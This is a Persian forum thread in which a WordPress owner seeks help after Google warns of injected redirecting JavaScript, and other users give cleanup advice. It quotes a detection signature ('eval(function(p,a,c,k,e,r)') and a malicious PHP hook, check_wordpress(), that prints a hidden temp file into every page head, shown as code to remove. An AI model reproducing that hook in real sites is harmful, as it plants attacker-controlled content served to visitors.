اخطاری که گوگل برای سایت من ارسال کرده چیست و باید چیکار کنم؟

[milijj]

سلام این اخطار رو تو گوگل وب مستر والسم فرستاده اینجور که خوندم متوجه شدم که اخطار و در واقع هشدار امنیتی داده ولی دقیقا متوجه نشدم باید چیکار کنم و چه طور این مساله رو برط رف کنم

اگه می تونید کمک کنید این اخطار رو پایین قرار می دم تا ببینید

Dear site owner or webmaster of http://www.........com/,

We are writing to let you know that we believe some of your website’s pages may be hacked. Specifically, we think that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar JavaScript and in particular any files containing "eval(function(p,a,c,k,e,r)". The malicious code may be placed in HTML, JavaScript or PHP files so it's important to be thorough in your search.

The following are example URLs from your site where we found such content:

http://www........com/خرید-عطر-آلوکالوژن/
http://www.........com/عطر-بلو-دی-اند-جی/
http://www.........com/عطر-دانهیل-2012/

In addition, it's also possible your server configuration files (such as Apache's .htaccess) have been compromised. As a result of this, your site may be cloaking and showing the malicious content only in certain situations.

We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but also to identify and fix the vulnerability. A good first step may be to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches.

More information about cleaning your site can be found at:

Cleaning your site - Webmaster Tools Help

Sincerely, Google Search Quality Team

 

[MihanV]

گفته احتمال میدیم سایت شما هک شده باشه چون یه سری کد مخرب داخل سایت شما هست که ممکن است توسط شخص ثالث کاربران رو به سایت های مخرب هدایت کند
گفته کد رو باید پیدا کنی و حذف ...
قسمت دوم گفته ممکنه از تنظیمات سرور شما باشه مثل Apache's .htaccess ....

 

[milijj]

گفته احتمال میدیم سایت شما هک شده باشه چون یه سری کد مخرب داخل سایت شما هست که ممکن است توسط شخص ثالث کاربران رو به سایت های مخرب هدایت کند
گفته کد رو باید پیدا کنی و حذف ...
قسمت دوم گفته ممکنه از تنظیمات سرور شما باشه مثل Apache's .htaccess ....

حالا تکلیف چیه من که نمیدونم از کجا شروع کنم و تا حالا این کار رو نکردم

میگی چیکار کنم تا مشکل رو بر طرف کنم؟

 

[MihanV]

حالا تکلیف چیه من که نمیدونم از کجا شروع کنم و تا حالا این کار رو نکردم

میگی چیکار کنم تا مشکل رو بر طرف کنم؟

از قالب سایت
باید ببینی جاوا اسکریپت مشکوکی تو سایت هست یا نه ... یا فایل .js
header.php , footer.php و functions.php رو اول از همه چک کن

 

[king_rings]

به هاستت بگو با اکسپلویت اسکنر هاستت رو اسکن کنه مسیر دقیق فایلهای الوده مشخص میشه

 

[milijj]

دمتون گرم اوکی پیگیری می کنم ببینم چی میشه

 

[milijj]

با هاستینگ خود مشورت کردم این راه حل ها رو بم پیشنهاد داده

با سلام

1- موقتاً کلیه افزونه ها را غیر فعال کرده و تست کنید
2) بروز رسانی وردپرس به آخرین نگارش (در صورتی که آخرین نگارش را دارید؛ وردپرس را راه اندازی مجدد کنید)، بروز رسانی افزونه ها به آخرین نگارش و حذف افزونه های ناشناس و غیرلازم
3) نصب افزونه زیر برای یافتن تروجان های وردپرسی
WordPress › Exploit Scanner

 

[MihanV]

احتمال 99 % از قالب سایت هست

 

[siavash20]

با هاستینگ خود مشورت کردم این راه حل ها رو بم پیشنهاد داده

با سلام

1- موقتاً کلیه افزونه ها را غیر فعال کرده و تست کنید
2) بروز رسانی وردپرس به آخرین نگارش (در صورتی که آخرین نگارش را دارید؛ وردپرس را راه اندازی مجدد کنید)، بروز رسانی افزونه ها به آخرین نگارش و حذف افزونه های ناشناس و غیرلازم
3) نصب افزونه زیر برای یافتن تروجان های وردپرسی
WordPress › Exploit Scanner

احیانا هاست رو از میهن وب هاست نگرفتی ؟

 

[milijj]

احیانا هاست رو از میهن وب هاست نگرفتی ؟

چرا از میهن وب هاست هست حالا تکلیف چیه؟

 

[milijj]

احتمال 99 % از قالب سایت هست

حالا باید چیکار کنم

ترو خدا یکی بگه من چیکار کنم از کجا شروع کنم؟

واسه اینکه نسخه جدید وردپرس آبدیت کنم چیکار کنم؟

اگه مشکل قالبه اونو باید چیکار کرد

قالب توسط فارس تمپ طراحی شده

 

[MihanV]

توی پست #4 نحوه دوچرخه سواری رو نگفتم , مرتبط با مشکل شماست ...

 

[milijj]

توی پست #4 نحوه دوچرخه سواری رو نگفتم , مرتبط با مشکل شماست ...

خوب قربون شکلت من از کجا بدونم کدوم فایل مشکوک هست یا نه
چرا دمت گرم راهنمایی کردی اما من یکم گیج میزنم

میشه زحمت بکشی بت مشخصات هاست رو بدم چک کنی بعدم نشونم بدی واسه دفعه های بعد

 

[GraphX]

خوب قربون شکلت من از کجا بدونم کدوم فایل مشکوک هست یا نه
چرا دمت گرم راهنمایی کردی اما من یکم گیج میزنم

میشه زحمت بکشی بت مشخصات هاست رو بدم چک کنی بعدم نشونم بدی واسه دفعه های بعد

این برمیگرده به تجربه تون
اگه تجربه ندارید بدید یکی که بلده واستون چک کنه

 

[Mahiar0]

با اجازه استارتر این سایت ما هم ببینید انتی ویروس به شما گیر میده قالب قبلی گیر میداد این نه ببینید برای شما هم گیر میده
جدیدترین عکس ها | سرگرمی و تفریحی

تو گوگل برام اخطار اومده بود

 

[MihanV]

با اجازه استارتر این سایت ما هم ببینید انتی ویروس به شما گیر میده قالب قبلی گیر میداد این نه ببینید برای شما هم گیر میده
جدیدترین عکس ها | سرگرمی و تفریحی

تو گوگل برام اخطار اومده بود

نه مشکلی نیست
nod32

 

[sajad1745]

این تروجان معمولا توی اکثر انتشار های وردپرس موجود هست و این هم روش حلش هست :
تروجان های p,a,c,k,e,d وردپرس و روش مقابله با آنها

 

[milijj]

این تروجان معمولا توی اکثر انتشار های وردپرس موجود هست و این هم روش حلش هست :
تروجان های p,a,c,k,e,d وردپرس و روش مقابله با آنها

این تروجان معمولا توی اکثر انتشار های وردپرس موجود هست و این هم روش حلش هست :
تروجان های p,a,c,k,e,d وردپرس و روش مقابله با آنها

من این فایل function.php رو نمی تونم پیدا کنم مسیرش تو هاست کجا هست؟

و اینکه این کد که گفته تو قسمت wp-setting.php رو هم نمی تونم پیدا کنم
Code
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );

 

[MihanV]

function.php تو پوشه قالب هست
site.com/wp-content/themes/themename/function.php

 

[sajad1745]

من این فایل function.php رو نمی تونم پیدا کنم مسیرش تو هاست کجا هست؟

و اینکه این کد که گفته تو قسمت wp-setting.php رو هم نمی تونم پیدا کنم
Code
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );

wp-setting رو فعلا حتما نباید ویرایش کنید ولی ویرایش فایل revisions-js.php بسیار ضروری هست